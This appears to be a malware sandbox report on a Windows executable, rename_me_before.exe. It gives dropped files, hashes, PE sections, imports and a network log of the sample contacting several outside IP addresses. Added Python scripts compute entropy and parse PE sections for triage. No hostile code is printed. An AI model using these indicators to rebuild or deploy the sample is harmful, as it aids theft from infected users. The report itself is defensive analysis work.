                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
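Every dropped-file entry above carries an "Entropy (8bit)" value, which is Shannon entropy over byte values in bits per byte: 0.0 for a file of one repeated byte, 8.0 for uniformly random data. The following is an added example, not code from Joe Sandbox or from the sample, that recomputes the measure and reproduces two of the report's own figures, the 4-byte `blat` file at exactly 2.0 and the 55-byte font-set JSON at 4.3065. The zero-padded and random samples are constructed stand-ins for the 32 KiB near-empty files and the 7.9966-entropy submitted executable; the triage bands are this example's own assumptions, not a Joe Sandbox scale.

```python
"""Recompute the report's 'Entropy (8bit)' field and use it for dropped-file triage (added example)."""
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy over byte values, in bits per byte (0.0 constant .. 8.0 uniform)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(entropy: float) -> str:
    """Coarse bands; the thresholds are this example's own choice."""
    if entropy >= 7.9:
        return "packed/encrypted/compressed: static strings are unreliable, unpack or detonate"
    if entropy >= 6.5:
        return "mixed: compiled code or embedded compressed resources"
    if entropy >= 3.5:
        return "text or structured data: read it directly"
    return "low: sparse or tiny file, look at the raw bytes"


# Constructed samples. The first two are the literal contents of two dropped files in this report.
SAMPLES = {
    "fonts JSON (svchost drop, 55 B)": b'{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}',
    "4-byte marker 'blat'": b"blat",
    "zeros with two header bytes (stand-in for the 32 KiB data files)": b"\x00\x2d" + b"\x00" * 32766,
    "random": os.urandom(65536),  # stand-in for the 7.9966-entropy submitted PE
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        h = shannon_entropy(blob)
        print(f"{h:.6f}  {len(blob):>6} B  {name}: {triage(h)}")
```

The near-zero value on the two 32 KiB files is why they are not interesting for triage: almost every byte is 0x00, and the Preview shows the handful that are not. The 7.9966 on the submitted executable (with a size of about 11.8 MB) is the opposite signal, consistent with a packed or compressed payload such as a self-extracting Python bundle, which is why the static hashes tell you less than the process tree does.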
                                                                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.996640205330543
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:rename_me_before.exe
                                                                                                                                                                                                                                                          File size:11'803'970 bytes
                                                                                                                                                                                                                                                          MD5:8b8040d5875e4c41ed5091f92021a16b
                                                                                                                                                                                                                                                          SHA1:4ebb7b91e64a7193b61a0e1405847ed13563f7d5
                                                                                                                                                                                                                                                          SHA256:7e7597691235f0ff8a8df29ee3e54ea7a69b43b4ef727adf511e7aec749dc68a
                                                                                                                                                                                                                                                          SHA512:4703f8ad9543f2aa47a1c964e13c7bad48a593284d53baac3581d6b584e63cad5c88afe6aca2c8f2c708369e757b2cd150b95247c01bfd8b58d6915fed524a7a
                                                                                                                                                                                                                                                          SSDEEP:196608:AUC1IYDEmmtSBLjv+bhqNVobZ1Uh8mAIv9P5jQ1KJEaKOlx:TC+OEZtSZL+9qzGZeII3MCCOlx
                                                                                                                                                                                                                                                          TLSH:0BC6332893E40AF6FD6B54399246C566DB3339620BB1E8CB53FC862A2F035D1DC36B51
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..
                                                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                          Entrypoint:0x14000c0d0
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0x6697E503 [Wed Jul 17 15:36:35 2024 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:456e8615ad4320c9f54e50319a19df9c
                                                                                                                                                                                                                                                          Instruction
Data directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3c76c          0x78          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x49000          0x92c         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x46000          0x2208        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x4a000          0x768         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x39dc0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x39c80          0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2b000          0x450         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x29210       0x29400   aca64598002ecff9eefbc96554edf015  False     0.5511067708333334   data       6.4784482217419175  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x2b000          0x12642       0x12800   fbe06eaab419c41c7764750dc7eacbcc  False     0.5245592271959459   data       5.750825186203614   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3e000          0x73d8        0xe00     d0a288978c66419b180b35f625b6dce7  False     0.13532366071428573  data       1.8378139998458343  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0x46000          0x2208        0x2400    74cf3ea22e0a1756984435d6f80f7da5  False     0.4671223958333333   data       5.259201915045256   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x49000          0x92c         0xa00     218ed766dcf431d387489105d0d36472  False     0.42578125           data       5.1444379013012504  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x4a000          0x768         0x800     71de9271648326ec88350e903470cf3e  False     0.5576171875         data       5.283119454571673   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
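The section table above is what a sandbox's static pass derives from the raw IMAGE_SECTION_HEADER array: RVA, sizes, a per-section MD5, Shannon entropy and the decoded Characteristics bits. The script below is an added example that reproduces those columns and adds two triage checks a reviewer applies to such a row (writable+executable, high entropy); it is not Joe Sandbox's code. The PE image it parses is constructed inline so it runs offline; its section names, contents, flag values and the 7.0 entropy threshold are illustrative assumptions, not values taken from this sample.

```python
"""Recompute the per-section columns of a PE section table (virtual address,
virtual size, raw size, MD5, entropy, decoded characteristics) from a raw
file image, the way a sandbox static pass does.

Added example for this report, not Joe Sandbox code. The PE image parsed
here is constructed below so the script runs offline; section names,
contents and flag values are made up for illustration.
"""
import hashlib
import math
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h), keyed by bit value.
SCN_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # 40-byte IMAGE_SECTION_HEADER


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    ent = -sum(c / n * math.log2(c / n) for c in counts if c)
    return ent if ent else 0.0  # normalise the -0.0 produced by constant data


def decode_characteristics(value: int) -> list:
    """Flag names in ascending bit order, the order the report prints them."""
    return [name for bit, name in sorted(SCN_FLAGS.items()) if value & bit]


def parse_sections(image: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section headers."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_opt = struct.unpack_from("<H", image, coff + 16)[0]
    offset = coff + 20 + size_opt  # first IMAGE_SECTION_HEADER
    sections = []
    for _ in range(num_sections):
        (name, vsize, vaddr, raw_size, raw_ptr,
         _relocs, _lines, _nrelocs, _nlines, chars) = SECTION_HDR.unpack_from(image, offset)
        raw = image[raw_ptr:raw_ptr + raw_size]  # on-disk bytes, as the MD5/entropy columns use
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "md5": hashlib.md5(raw).hexdigest(),
            "entropy": shannon_entropy(raw),
            "characteristics": decode_characteristics(chars),
        })
        offset += SECTION_HDR.size
    return sections


def audit(section: dict) -> list:
    """Cheap triage heuristics applied to one row of the section table."""
    reasons = []
    c = section["characteristics"]
    if "IMAGE_SCN_MEM_WRITE" in c and "IMAGE_SCN_MEM_EXECUTE" in c:
        reasons.append("writable and executable")
    if section["entropy"] > 7.0:  # assumed threshold; packed or encrypted payloads sit near 8.0
        reasons.append("entropy above 7.0")
    return reasons


def build_sample_image() -> bytes:
    """Constructed minimal PE32+ image with two sections (not a real binary)."""
    file_align = 0x200
    sections = [  # name, RVA, raw content, Characteristics
        (b".text", 0x1000, bytes(range(256)) * 2, 0x60000020),  # CODE|EXECUTE|READ, uniform bytes
        (b".data", 0x2000, b"\0" * 0x200, 0xC0000040),          # INIT_DATA|READ|WRITE, all zero
    ]
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = struct.pack("<H", 0x20B) + b"\0" * 0xEE  # PE32+ magic, remaining optional header zeroed
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x22)
    hdrs, raw_ptr = b"", file_align
    for name, rva, data, chars in sections:
        raw_size = -(-len(data) // file_align) * file_align
        hdrs += SECTION_HDR.pack(name, len(data), rva, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += raw_size
    image = (dos + b"PE\0\0" + coff + opt + hdrs).ljust(file_align, b"\0")
    for _, _, data, _ in sections:
        image += data.ljust(-(-len(data) // file_align) * file_align, b"\0")
    return image


if __name__ == "__main__":
    for s in parse_sections(build_sample_image()):
        print(f"{s['name']:<8}{s['virtual_address']:#08x}  {s['virtual_size']:#07x}  "
              f"{s['raw_size']:#07x}  {s['md5']}  {s['entropy']:.4f}  "
              f"{', '.join(s['characteristics'])}  {audit(s)}")
```

Point `parse_sections` at a file read with `open(path, "rb").read()` to get the same columns for a real sample; `decode_characteristics(0x42000040)` yields the three flags listed for `.reloc` above, in the report's order.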
Resources

Name         RVA      Size   Type                          Language  Country  ZLIB Complexity
RT_VERSION   0x490a0  0x37c  data                                             0.460762331838565
RT_MANIFEST  0x4941c  0x50d  XML 1.0 document, ASCII text                     0.4694508894044857
Imports

DLL           Import
USER32.dll    CreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll  (no named imports listed)
KERNEL32.dll  GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll  OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll     SelectObject, DeleteObject, CreateFontIndirectW
Network traffic (TCP packets)

Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Jan 1, 2025 02:53:05.386758089 CET  49739        80         192.168.2.4      208.95.112.1
Jan 1, 2025 02:53:05.392743111 CET  80           49739      208.95.112.1     192.168.2.4
Jan 1, 2025 02:53:05.392821074 CET  49739        80         192.168.2.4      208.95.112.1
Jan 1, 2025 02:53:05.393385887 CET  49739        80         192.168.2.4      208.95.112.1
Jan 1, 2025 02:53:05.398155928 CET  80           49739      208.95.112.1     192.168.2.4
Jan 1, 2025 02:53:05.850951910 CET  80           49739      208.95.112.1     192.168.2.4
Jan 1, 2025 02:53:05.851802111 CET  49739        80         192.168.2.4      208.95.112.1
Jan 1, 2025 02:53:05.856730938 CET  80           49739      208.95.112.1     192.168.2.4
Jan 1, 2025 02:53:05.857248068 CET  49739        80         192.168.2.4      208.95.112.1
Jan 1, 2025 02:53:19.620937109 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:19.620968103 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:19.621056080 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:19.621670008 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:19.621680975 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.096553087 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.097295046 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.097311974 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.098354101 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.098436117 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.100450993 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.100450993 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.100514889 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.100641966 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.141009092 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.141015053 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.187891960 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.296360016 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.296469927 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.296669960 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.297401905 CET  49751        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.297413111 CET  443          49751      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.300766945 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.300801039 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.301023960 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.301423073 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.301438093 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.758567095 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.759187937 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.759205103 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.760251999 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.760308981 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.762096882 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.762170076 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.762465000 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.762470961 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.762574911 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.807341099 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.812860012 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.975532055 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.975666046 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.975716114 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.976432085 CET  49752        443        192.168.2.4      162.159.137.232
Jan 1, 2025 02:53:20.976444960 CET  443          49752      162.159.137.232  192.168.2.4
Jan 1, 2025 02:53:20.979077101 CET  49753        443        192.168.2.4      162.159.128.233
Jan 1, 2025 02:53:20.979118109 CET  443          49753      162.159.128.233  192.168.2.4
Jan 1, 2025 02:53:20.979367018 CET  49753        443        192.168.2.4      162.159.128.233
Jan 1, 2025 02:53:20.979947090 CET  49753        443        192.168.2.4      162.159.128.233
Jan 1, 2025 02:53:20.979963064 CET  443          49753      162.159.128.233  192.168.2.4
Jan 1, 2025 02:53:21.443108082 CET  443          49753      162.159.128.233  192.168.2.4
Jan 1, 2025 02:53:21.443856955 CET  49753        443        192.168.2.4      162.159.128.233
Jan 1, 2025 02:53:21.443871021 CET  443          49753      162.159.128.233  192.168.2.4
Jan 1, 2025 02:53:21.444909096 CET  443          49753      162.159.128.233  192.168.2.4
Jan 1, 2025 02:53:21.444968939 CET  49753        443        192.168.2.4      162.159.128.233
Jan 1, 2025 02:53:21.446790934 CET  49753        443        192.168.2.4      162.159.128.233
Jan 1, 2025 02:53:21.446856976 CET  443          49753      162.159.128.233  192.168.2.4
Jan 1, 2025 02:53:21.447151899 CET  49753        443        192.168.2.4      162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.447159052 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449171066 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449228048 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449395895 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449429989 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449569941 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449588060 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449779034 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.449806929 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450032949 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450068951 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450308084 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450345993 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450356960 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450362921 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450572014 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450592041 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450615883 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450629950 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450635910 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450774908 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450813055 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.450848103 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.459542990 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.459768057 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.459786892 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.459806919 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.459846973 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.459865093 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.459990978 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.464272976 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.464376926 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:21.464392900 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:22.381946087 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:22.382055044 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:22.382167101 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:22.382844925 CET49753443192.168.2.4162.159.128.233
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:22.382858992 CET44349753162.159.128.233192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.336702108 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.336733103 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.336796999 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.337780952 CET49758443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.337789059 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.960531950 CET4434975845.112.123.126192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.962233067 CET49758443192.168.2.445.112.123.126
